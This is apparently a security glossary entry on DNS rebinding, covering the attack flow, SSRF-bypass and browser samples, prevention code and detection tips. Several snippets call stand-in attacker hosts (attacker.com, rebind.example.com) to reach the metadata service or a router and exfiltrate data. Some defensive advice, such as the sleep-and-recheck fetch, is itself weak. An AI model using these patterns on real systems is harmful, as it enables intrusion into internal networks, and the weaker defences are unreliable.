DNS Rebinding

Short Definition

DNS rebinding is when attackers control a domain and keep changing what IP address it points to. First, security check sees it pointing to a safe IP (passes). Then, before the actual request, they change it to point to internal servers (attack succeeds). Timing is everything.

Full Definition

DNS rebinding exploits the gap between DNS resolution checks and actual network connections by changing DNS records with very short TTL (Time To Live).

Attack flow:

1. Attacker controls: evil.com
2. Sets DNS TTL: 0 seconds (immediate expiration)
3. Initial resolution: evil.com → 1.2.3.4 (attacker's server)
4. Security check: "1.2.3.4 is safe" ✓
5. DNS record changes: evil.com → 192.168.1.1 (internal IP)
6. Actual request: Resolves again, gets 192.168.1.1
7. Request goes to: Internal server

Why it works:

• DNS caching may be bypassed with TTL=0
• Security checks and actual requests don't share DNS cache
• Applications re-resolve DNS for each request
• No validation that IP stayed the same

Why It Matters

• Bypasses IP-based SSRF protections
• Works even with proper domain allowlists
• Difficult to defend against
• Can target browsers, servers, IoT devices
• Enables access to internal networks

How Attackers Use It

Classic SSRF bypass:

1# Application code:
2url = user_input  # "http://attacker.com/path"
3parsed = urlparse(url)
4
5# Security check:
6ip = socket.gethostbyname(parsed.hostname)
7if not is_private_ip(ip):  # Check passes: public IP
8    # Time gap here!
9    response = requests.get(url)  # Re-resolves, gets private IP
10    return response

Attack setup:

1# Attacker's DNS server responds dynamically:
2def handle_dns_query(domain):
3    if request_count(domain) == 0:
4        return "1.2.3.4"  # Public IP for first request
5    else:
6        return "169.254.169.254"  # Metadata service for second

Browser-based attack:

1// Malicious page loads in browser
2fetch('http://attacker.com/rebind')
3  .then(() => {
4    // DNS rebinding happened
5    // Now points to 192.168.1.1 (router)
6    // Can access router admin page
7    fetch('http://attacker.com/admin')
8      .then(data => exfiltrate(data));
9  });

How to Detect or Prevent It

Prevention:

1. Re-resolve and re-check before each request:

1def safe_fetch(url):
2    # Initial check
3    ip1 = resolve(url)
4    if is_private_ip(ip1):
5        reject()
6    
7    # Sleep to force any DNS changes
8    time.sleep(1)
9    
10    # Re-check just before request
11    ip2 = resolve(url)
12    if ip2 != ip1 or is_private_ip(ip2):
13        reject()
14    
15    # Make request using IP directly
16    return requests.get(f"http://{ip2}{path}")

2. Use IP instead of hostname:

1# Resolve once, use IP throughout
2ip = resolve_and_validate(hostname)
3response = requests.get(
4    f"http://{ip}{path}",
5    headers={"Host": hostname}
6)

3. Minimum DNS TTL:

1# Ignore TTL below threshold
2def resolve(hostname):
3    result = dns.query(hostname)
4    if result.ttl < 300:  # Minimum 5 minutes
5        result.ttl = 300
6    return result.ip

4. Pin DNS resolution:

1# Use single resolution for entire operation
2with dns_pinned(url):
3    validate(url)
4    response = fetch(url)
5    process(response)

Browser protections:

• DNS prefetching limits
• Private network access restrictions (Chrome)
• CORS with DNS rebinding protections

Detection:

• Monitor DNS queries with TTL=0
• Alert on domains resolving to different IPs rapidly
• Track domains that change from public to private IPs
• Log both validation IP and actual request IP

Common Misconceptions

• "Checking IP once is enough" - DNS can change
• "TTL=0 should be blocked" - Sometimes legitimate
• "HTTPS prevents this" - Certificate may still be valid
• "Only affects browsers" - Server-side applications too
• "Firewall blocks it" - Firewall sees valid outbound request

Real-World Example

Router Hijacking (2018)

1. Victim visits: evil-ad.com (malicious ad)
2. First resolution: evil-ad.com → 1.2.3.4 (passes CORS)
3. DNS rebinding: evil-ad.com → 192.168.1.1 (router)
4. JavaScript requests: Now accessing router admin
5. Exploit: Change DNS settings, redirect traffic

Kubernetes Metadata Exploit

1# Attacker domain: rebind.example.com
2# TTL: 0
3
4# First resolution:
5rebind.example.com → 52.1.2.3 (passes allowlist)
6
7# Second resolution (microseconds later):
8rebind.example.com → 169.254.169.254 (metadata)
9
10# Application makes request:
11curl http://rebind.example.com/latest/meta-data/
12# Actually hits metadata service

Singularity of Origin

Public tool demonstrating DNS rebinding:

• Targets internal services
• Automatic IP rotation
• Pre-built exploits for routers, admin panels
• Shows real-world impact

Related Terms

DNS, SSRF, Bypass, URL Parser, Same-Origin Policy

================================================================================

[Continuing with remaining terms 18-20...]